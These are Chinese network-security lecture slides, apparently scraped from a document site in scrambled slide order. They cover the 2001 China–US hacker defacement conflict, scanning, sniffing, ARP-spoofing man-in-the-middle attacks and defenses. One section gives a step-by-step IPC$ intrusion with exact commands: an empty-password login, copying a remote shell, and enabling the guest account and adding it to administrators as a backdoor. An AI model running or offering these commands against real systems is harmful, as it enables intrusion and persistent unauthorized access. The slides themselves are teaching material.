常见网络攻击与防范(精)

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
提 升 为 最 高 权 限 攻击其 他系统
端口 判断 分析 可能 有漏 洞的 服务
安装 多个 系统 后门
清除 入侵 脚印
获取敏 感信息
作为其 他用途
2001年中美黑客大战
事件背景和经过
4.1撞机事件为导火线 4月初,以PoizonB0x、pr0phet为代表的美国黑客 组织对国内站点进行攻击,约300个左右的站点页 面被修改 4月下旬,国内红(黑)客组织或个人,开始对美 国网站进行小规模的攻击行动,4月26日有人发表 了 “五一卫国网战”战前声明,宣布将在5月1日至 8日,对美国网站进行大规模的攻击行动。 各方都得到第三方支援 各大媒体纷纷报道,评论,中旬结束大战
PoizonB0x、pr0phet更改的网页
国内某大型商业网站 国内某政府网站
中国科学院心理研究所
中经网数据有限公司
国内黑客组织更改的网站页面
美国某大型商业网站 美国某政府网站
美国劳工部网站
美国某节点网站
这次事件中采用的常用攻击手法
红客联盟负责人在5月9日网wk.baidu.com记者新闻发布会
上对此次攻击事件的技术背景说明如下: “我 们更多的是一种不满情绪的发泄,大家也可以 看到被攻破的都是一些小站,大部分都是 NT/Win2000系统, 这个行动在技术上是没有 任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击
A发往B:(MACx,MACa, PROTOCOL,DATA) B发往A:(MACx,MACb, PROTOCOL,DATA)
网络监听及防范技术
——交换式局域网下
X分别向A和B发送ARP包,促使其修改
ARP表 主机A的ARP表中B为<IPb—MACx> 主机B的ARP表中A为<IPa—MACx> X成为主机A和主机B之间的“中间人”
网络监听及防范技术
分割网段
——网络窃听的被动防范
细化网络会使得局域网中被窃听的可能性减小
使用静态ARP表
手工输入<IP—MAC>地址对
采用第三层交换方式
取消局域网对MAC地址、ARP协议的依赖,而采用基于 IP地址的交换
加密
SSH、SSL、IPSec
网络监听及防范技术
——网络窃听的主动防范 共享式局域网下的主动防范措施 伪造数据包
网络监听及防范技术
——交换式局域网下
ARP改向的中间人窃听
交换式局域网 交换式局域网 数据流 主机A (正常通信状态) 主机B 主机A 数据流 主机X (存在窃听的通信状态) 数据流 主机B
A发往B:(MACb,MACa, PROTOCOL,DATA) B发往A:(MACa,MACb, PROTOCOL,DATA)
常见网络攻击与防范
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
提纲
常见的网络攻击方法
常用的安全防范措施
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
这次事件中被利用的典型漏洞
用户名泄漏,缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名
和密码 SQL server缺省安装 微软Windows 2000登录验证机制可被绕过 Bind 远程溢出,Lion蠕虫 SUN rpc.sadmind 远程溢出,sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞 拒绝服务 (syn-flood , ping )
一次利用ipc$的入侵过程
1. C:\>net use \\x.x.x.x\IPC$ “” /user:“admintitrators”
用《流光》扫到的用户名是administrators,密码为“空”的IP地址 2. C:\>copy srv.exe \\x.x.x.x\admin$ 先复制srv.exe上去,在流光的Tools目录下 3. C:\>net time \\x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00,命令成功 完成。 4. C:\>at \\x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:\>net time \\x.x.x.x 再查查时间到了没有,如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05, 那就准备开始下面的命令。 6. C:\>telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但 是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激 活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
常见的网络攻击方法
本资料由-校园大学生创业网-提供http://www.chuangyw.com/ 在线代理http://www.dailiav.com/提供部分资料
入侵技术的发展

包欺骗 半开放隐蔽扫描 拒绝服务 DDOS 攻击 www 攻击 自动探测扫描 GUI远程控制 后门 破坏审计系统 会话劫持 控制台入侵 利用已知的漏洞 密码破解 可自动复制的代码 密码猜测 检测网络管理
获取信息
1. 收集主机信息
IP地址、主机是否运行、到要入侵点的路由、主机操作系 统与用户信息等。
应用的方法:
• Ping命令判断计算机是否开着,或者数据包发送到返回 需要多少时间 • Tracert/Tracerout命令跟踪从一台计算机到另外一台 计算机所走的路径 • Finger和Rusers命令收集用户信息 • Host或者Nslookup命令,结合Whois和Finger命令获取 主机、操作系统和用户等信息
工具
入侵者水平
嗅探 擦除痕迹
攻击手法
1980
攻击者
1995 2000 2002
1985
1990
入侵系统的常用步骤
提 升 为 最 高 权 限
采用 漏洞 扫描 工具
选择 会用 的 方式 入侵
获取 系统 一定 权限
安装 系统 后门
获取敏感信息 或者 其他攻击目的
较高明的入侵步骤
判断 系统 选择 最简 方式 入侵 获取 系统 一定 权限
2. 端口扫瞄
获取网络服务的端口作为入侵通道。
7种扫瞄类型:
1.TCP Connect() 3.TCP FIN 5.TCP反向Ident扫瞄 7.UDP ICMP不到达扫瞄
2.TCP SYN 4.IP段扫瞄 6.FTP代理扫瞄
扫瞄软件举例:
1. NSS (网络安全扫描器),可执行 Sendmail 、匿名 FTP 、 NFS出口、TFTP、Host.equiv和Xhost等常规检查。 2. Strobe( 超级优化 TCP 端口检测程序 ) ,可记录指定机器上 的所有开放端口,快速识别指定机器上运行的服务,提示 可以被攻击的服务。 3. SATAN(安全管理员的网络分析工具),SATAN用于扫描远程 主机,发现漏洞,包括FTPD漏洞和可写的FTP目录,NFS漏 洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。 4. Jakal扫描器,可启动而不完成TCP连接,因此可以扫描一 个区域而不留下痕迹。 5. IdengTCPscan扫描器,可识别指定TCP端口的进程的UID。
这次事件中被利用的典型漏洞
用户名泄漏,缺省安装的系统用户名和
密码
入侵者
利用黑客工具 扫描系统用户
获得用户名 和简单密码
这次事件中被利用的典型漏洞
Windows 2000登录验证机制可被绕过
常见的安全攻击方法
直接获取口令进入系统:网络监听,暴力破解 利用系统自身安全漏洞 特洛伊木马程序:伪装成工具程序或者游戏等诱使用
监听通过交换机或者网关的所有ARP数据包,与预先建 立的数据库相比较
3.Sniffer扫瞄
原理: sniffer类的软件能把本地网卡设置成工作在 “混杂” (promiscuous)方式,使该网卡能接 收所有数据帧,从而获取别人的口令、金融帐号或 其他敏感机密信息等。 方法与对策: 1、用交换机替换HUB,交换机是两两接通,比普 通HUB安全。 2、使用检测的软件,如CPM Antisniff等,检测网 络中是否有网卡工作在混杂状态(基本原理是发送 本网中并不存在的MAC地址,看看是否有回应,如 有回应,则说明有计算机网卡工作在混杂模式。)。
计算机 C C为直接模式 接收该数据
计算机 D D为直接模式 拒绝接收
计算机 E E为混杂模式 接收该数据
网络监听及防范技术
——交换式局域网下
在数据链路层,数据帧的目的地址是以网
卡的MAC地址来标识 ARP协议实现<IP—MAC>的配对寻址 ARP请求包是以广播的形式发出,正常情 况下只有正确IP地址与的主机才会发出 ARP响应包,告知查询主机自己的MAC地 址。 局域网中每台主机都维护着一张ARP表, 其中存放着<IP—MAC>地址对。
一次利用ipc$的入侵过程
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
ntlm.exe也在《流光》的Tools目录中 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>是在对方计算机上运行当 出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了 为了方便日后登陆,将guest激活并加到管理组 10. C:\>net user guest /active:yes 11. C:\>net user guest 1234 将Guest的密码改为1234 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator
网络监听及防范技术
网络窃听是指通过截获他人网络上通信的
数据流,并非法从中提取重要信息的一种 方法 间接性
利用现有网络协议的一些漏洞来实现,不直接对受害主 机系统的整体性进行任何操作或破坏
隐蔽性
网络窃听只对受害主机发出的数据流进行操作,不与主 机交换信息,也不影响受害主机的正常通信
网络监听及防范技术
构造一个含有正确目标IP地址和一个不存在目标MAC地 址——各个操作系统处理方式不同,一个比较好的MAC 地址是FF-FF-FF-FF-FF-FE
性能分析
向网络上发送大量包含无效MAC地址的数据包,窃听主 机会因处理大量信息而导致性能下降
网络监听及防范技术
——网络窃听的主动防范 交换式局域网下的主动防范措施 监听ARP数据包
若等于自己的MAC地址或是广播MAC地址,则提交给 上层处理程序,否则丢弃此数据
当网卡工作于混杂模式的时候,它不做任
何判断,直接将接收到的所有帧提交给上 层处理程序 共享式网络下窃听就使用网卡的混杂模式
网络监听及防范技术
——共享式局域网下
集线器(HUB)
A向C发送数 据
计算机 A
计算机 B B为直接模式 拒绝接收
——共享式局域网下
共享式局域网采用的是广播信道,每一台
主机所发出的帧都会被全网内所有主机接 收到 一般网卡具有以下四种工作模式:广播模 式、多播模式、直接模式和混杂模式 网卡的缺省工作模式是广播模式和直接模 式,即只接收发给自己的和广播的帧
网络监听及防范技术
——共享式局域网下
使用MAC地址来确定数据包的流向


户打开或下载,然后使用户在无意中激活,导致系统 后门被安装 WWW欺骗:诱使用户访问纂改过的网页 电子邮件攻击:邮件炸弹、邮件欺骗 网络监听:获取明文传输的敏感信息 通过一个节点来攻击其他节点:攻击者控制一台主机 后,经常通过IP欺骗或者主机信任关系来攻击其他节 点以隐蔽其入侵路径和擦除攻击证据 拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S)
相关文档
最新文档